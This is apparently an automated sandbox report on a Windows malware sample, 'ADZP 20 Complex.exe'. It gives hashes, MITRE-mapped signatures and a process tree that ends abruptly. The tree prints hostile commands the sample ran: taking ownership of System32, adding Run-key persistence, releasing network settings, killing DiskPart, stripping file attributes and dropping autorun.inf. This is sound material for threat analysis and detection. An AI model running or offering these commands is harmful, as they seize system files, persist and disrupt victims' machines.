6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f

Analysis

max time kernel
25s
max time network
125s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27-04-2024 16:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ADZP 20 Complex.exe
Size

106KB
MD5

8b6a377f9a67d5482a8eba5708f45bb2
SHA1

7197436525e568606850ee5e033c43aea1c3bc91
SHA256

6ca11c8b6442db97c02f3b0f73db61f58c96d52e8a880e33abee5b10807d993f
SHA512

644e51798399168530b05e629b414dd80cac678bd3c8d4a5d164f55736a2b2fd380d3ca4640f7a034c8f043c06b1527b473e2d17da088d5e97de6ea04120dd72
SSDEEP

3072:v7DhdC6kzWypvaQ0FxyNTBfqMXERseQF8:vBlkZvaF4NTBSAesPF8

Score

8^/10

discovery exploit spyware stealer

Malware Config

Signatures

Possible privilege escalation attempt 17 IoCs

exploit

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exe

pid	process
6288	takeown.exe
6732	takeown.exe
2264	takeown.exe
6708	takeown.exe
6756	takeown.exe
7496	icacls.exe
6692	takeown.exe
6252	takeown.exe
10468	icacls.exe
752	takeown.exe
13164	icacls.exe
6716	takeown.exe
2360	takeown.exe
6700	takeown.exe
14948	icacls.exe
6352	takeown.exe
2736	takeown.exe

Executes dropped EXE 12 IoCs

Processes:

ADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exeADZP 20 Complex.exe

pid	process
2656	ADZP 20 Complex.exe
1876	ADZP 20 Complex.exe
1548	ADZP 20 Complex.exe
3364	ADZP 20 Complex.exe
3428	ADZP 20 Complex.exe
3572	ADZP 20 Complex.exe
3568	ADZP 20 Complex.exe
3844	ADZP 20 Complex.exe
3936	ADZP 20 Complex.exe
3948	ADZP 20 Complex.exe
3708	ADZP 20 Complex.exe
4104	ADZP 20 Complex.exe

Modifies file permissions 1 TTPs 17 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exeicacls.exetakeown.exetakeown.exetakeown.exeicacls.exe

pid	process
2264	takeown.exe
752	takeown.exe
6288	takeown.exe
6732	takeown.exe
7496	icacls.exe
2736	takeown.exe
6252	takeown.exe
6352	takeown.exe
6700	takeown.exe
13164	icacls.exe
6708	takeown.exe
6756	takeown.exe
14948	icacls.exe
2360	takeown.exe
6692	takeown.exe
6716	takeown.exe
10468	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops autorun.inf file 1 TTPs 11 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

Processes:

cmd.execmd.execmd.exeattrib.execmd.exeattrib.exeattrib.execmd.execmd.execmd.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\Autorun.inf	attrib.exe

Drops file in System32 directory 8 IoCs

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File created	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe
File opened for modification	C:\Windows\System32\Twain_20.dll	cmd.exe

Drops file in Windows directory 12 IoCs

Processes:

mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Gathers network information 2 TTPs 27 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid	process
4020	ipconfig.exe
5500	ipconfig.exe
10416	ipconfig.exe
1748	ipconfig.exe
10664	ipconfig.exe
10368	ipconfig.exe
10372	ipconfig.exe
2696	ipconfig.exe
10300	ipconfig.exe
13440	ipconfig.exe
16212	ipconfig.exe
6164	ipconfig.exe
4808	ipconfig.exe
6156	ipconfig.exe
2832	ipconfig.exe
18056	ipconfig.exe
13200	ipconfig.exe
9300	ipconfig.exe
10716	ipconfig.exe
12824	ipconfig.exe
5976	ipconfig.exe
4444	ipconfig.exe
4564	ipconfig.exe
2604	ipconfig.exe
6180	ipconfig.exe
12856	ipconfig.exe
1160	ipconfig.exe

Kills process with taskkill 25 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
6272	taskkill.exe
12076	taskkill.exe
11316	taskkill.exe
4296	taskkill.exe
4760	taskkill.exe
11180	taskkill.exe
12084	taskkill.exe
13000	taskkill.exe
4756	taskkill.exe
6216	taskkill.exe
6264	taskkill.exe
2780	taskkill.exe
2692	taskkill.exe
14804	taskkill.exe
2592	taskkill.exe
6280	taskkill.exe
6548	taskkill.exe
12008	taskkill.exe
13660	taskkill.exe
13964	taskkill.exe
6228	taskkill.exe
14092	taskkill.exe
2108	taskkill.exe
6188	taskkill.exe
14264	taskkill.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 12 IoCs

Processes:

pid	process
2656	ADZP 20 Complex.exe
1876	ADZP 20 Complex.exe
1548	ADZP 20 Complex.exe
3364	ADZP 20 Complex.exe
3428	ADZP 20 Complex.exe
3572	ADZP 20 Complex.exe
3568	ADZP 20 Complex.exe
3844	ADZP 20 Complex.exe
3936	ADZP 20 Complex.exe
3948	ADZP 20 Complex.exe
3708	ADZP 20 Complex.exe
4104	ADZP 20 Complex.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

takeown.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetakeown.exetakeown.exetakeown.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeTakeOwnershipPrivilege	2736	takeown.exe
Token: SeDebugPrivilege	2780	taskkill.exe
Token: SeDebugPrivilege	2108	taskkill.exe
Token: SeDebugPrivilege	2692	taskkill.exe
Token: SeDebugPrivilege	2592	taskkill.exe
Token: SeTakeOwnershipPrivilege	2264	takeown.exe
Token: SeTakeOwnershipPrivilege	2360	takeown.exe
Token: SeTakeOwnershipPrivilege	752	takeown.exe
Token: SeDebugPrivilege	4296	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe

Suspicious use of SetWindowsHookEx 36 IoCs

Processes:

mspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exemspaint.exe

pid	process
1800	mspaint.exe
1664	mspaint.exe
324	mspaint.exe
1664	mspaint.exe
324	mspaint.exe
1800	mspaint.exe
1664	mspaint.exe
1800	mspaint.exe
324	mspaint.exe
1664	mspaint.exe
1800	mspaint.exe
324	mspaint.exe
3420	mspaint.exe
3484	mspaint.exe
3632	mspaint.exe
3420	mspaint.exe
3632	mspaint.exe
3484	mspaint.exe
3420	mspaint.exe
3420	mspaint.exe
3632	mspaint.exe
3632	mspaint.exe
3484	mspaint.exe
3484	mspaint.exe
3796	mspaint.exe
3912	mspaint.exe
3704	mspaint.exe
3532	mspaint.exe
3684	mspaint.exe
4164	mspaint.exe
3796	mspaint.exe
3912	mspaint.exe
3704	mspaint.exe
3532	mspaint.exe
3684	mspaint.exe
4164	mspaint.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ADZP 20 Complex.execmd.execmd.exe

description	pid	process	target process
PID 2968 wrote to memory of 1996	2968	ADZP 20 Complex.exe	cmd.exe
PID 2968 wrote to memory of 1996	2968	ADZP 20 Complex.exe	cmd.exe
PID 2968 wrote to memory of 1996	2968	ADZP 20 Complex.exe	cmd.exe
PID 2968 wrote to memory of 1996	2968	ADZP 20 Complex.exe	cmd.exe
PID 1996 wrote to memory of 2668	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2668	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2668	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2708	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2708	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2708	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2912	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2912	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2912	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2092	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2092	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2092	1996	cmd.exe	cmd.exe
PID 1996 wrote to memory of 2472	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2472	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2472	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2724	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2724	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2724	1996	cmd.exe	reg.exe
PID 1996 wrote to memory of 2696	1996	cmd.exe	ipconfig.exe
PID 1996 wrote to memory of 2696	1996	cmd.exe	ipconfig.exe
PID 1996 wrote to memory of 2696	1996	cmd.exe	ipconfig.exe
PID 2092 wrote to memory of 2736	2092	cmd.exe	takeown.exe
PID 2092 wrote to memory of 2736	2092	cmd.exe	takeown.exe
PID 2092 wrote to memory of 2736	2092	cmd.exe	takeown.exe
PID 1996 wrote to memory of 2780	1996	cmd.exe	taskkill.exe
PID 1996 wrote to memory of 2780	1996	cmd.exe	taskkill.exe
PID 1996 wrote to memory of 2780	1996	cmd.exe	taskkill.exe
PID 1996 wrote to memory of 1616	1996	cmd.exe	attrib.exe
PID 1996 wrote to memory of 1616	1996	cmd.exe	attrib.exe
PID 1996 wrote to memory of 1616	1996	cmd.exe	attrib.exe
PID 1996 wrote to memory of 2552	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2552	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2552	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 840	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 840	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 840	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2204	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2204	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2204	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1264	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1264	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1264	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2304	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2304	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2304	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1796	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1796	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1796	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1880	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1880	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 1880	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 884	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 884	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 884	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 3048	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2684	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2684	1996	cmd.exe	WScript.exe
PID 1996 wrote to memory of 2684	1996	cmd.exe	WScript.exe

Views/modifies file attributes 1 TTPs 17 IoCs

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	process
7396	attrib.exe
7520	attrib.exe
8212	attrib.exe
7012	attrib.exe
7876	attrib.exe
6188	attrib.exe
5580	attrib.exe
1324	attrib.exe
8140	attrib.exe
6960	attrib.exe
7004	attrib.exe
1492	attrib.exe
1060	attrib.exe
15420	attrib.exe
15664	attrib.exe
1616	attrib.exe
7368	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2968

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\258A.tmp\258B.tmp\258C.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
2⤵
- Drops autorun.inf file
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
3⤵
PID:2708

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
3⤵
PID:2912

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
3⤵
- Suspicious use of WriteProcessMemory
PID:2092

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2736

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:2472

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
3⤵
PID:2724

C:\Windows\system32\ipconfig.exe
ipconfig /release
3⤵
- Gathers network information
PID:2696

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
3⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1616

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:840

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2204

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1264

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:2304

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:1796

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:1880

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
3⤵
PID:3048

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
3⤵
PID:2684

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:2408

C:\Windows\system32\msg.exe
msg * Virus Detectado
3⤵
PID:2540

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
3⤵
PID:2472

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2656

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2AF7.tmp\2AF8.tmp\2AF9.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
4⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:1676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
5⤵
PID:2580

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
5⤵
PID:1452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
5⤵
PID:1224

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2264

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:1052

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
5⤵
PID:1380

C:\Windows\system32\ipconfig.exe
ipconfig /release
5⤵
- Gathers network information
PID:1748

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2108

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
5⤵
- Drops autorun.inf file
- Views/modifies file attributes
PID:1492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:948

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:1112

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:2208

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:2352

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:340

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:1436

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:1236

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:1520

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
5⤵
PID:2740

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
5⤵
PID:2532

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:2248

C:\Windows\system32\msg.exe
msg * Virus Detectado
5⤵
PID:3088

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
5⤵
PID:3144

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3364

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\61DE.tmp\61DF.tmp\61E0.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
6⤵
- Drops autorun.inf file
- Drops file in System32 directory
PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:4556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
7⤵
PID:4652

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
7⤵
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
7⤵
PID:4684

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32" /r
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6288

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:4532

C:\Windows\system32\reg.exe
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
7⤵
PID:4404

C:\Windows\system32\ipconfig.exe
ipconfig /release
7⤵
- Gathers network information
PID:4444

C:\Windows\system32\taskkill.exe
taskkill /im DiskPart /f
7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\system32\attrib.exe
attrib -r -a -s -h *.*
7⤵
- Views/modifies file attributes
PID:7012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:6824

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:2472

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:3412

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:4816

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:7620

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:8180

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:5484

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:5344

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"
7⤵
PID:6480

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"
7⤵
PID:7580

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:7396

C:\Windows\system32\msg.exe
msg * Virus Detectado
7⤵
PID:4276

C:\Windows\system32\msg.exe
msg * Has Sido Hackeado!
7⤵
PID:6296

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:8480

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E72.tmp\E73.tmp\E74.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:16024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:15816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:16540

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"
9⤵
PID:17828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Taskdl.bat
9⤵
PID:17916

C:\Windows\system32\reg.exe
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
9⤵
PID:18000

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:8500

C:\Windows\system32\calc.exe
calc
7⤵
PID:8520

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:8532

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:8548

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:8580

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\2E70.tmp\2E71.tmp\2E82.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:12064

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:16852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:17020

C:\Windows\system32\notepad.exe
notepad
7⤵
PID:8592

C:\Windows\system32\calc.exe
calc
7⤵
PID:8696

C:\Windows\explorer.exe
explorer.exe
7⤵
PID:8712

C:\Windows\system32\mspaint.exe
mspaint.exe
7⤵
PID:8816

C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe
"C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe"
7⤵
PID:8832

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3B0D.tmp\3B0E.tmp\3B0F.bat "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.exe""
8⤵
PID:16448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K Twain_20.cmd
9⤵
PID:17668

C:\Windows\system32\cmd.exe
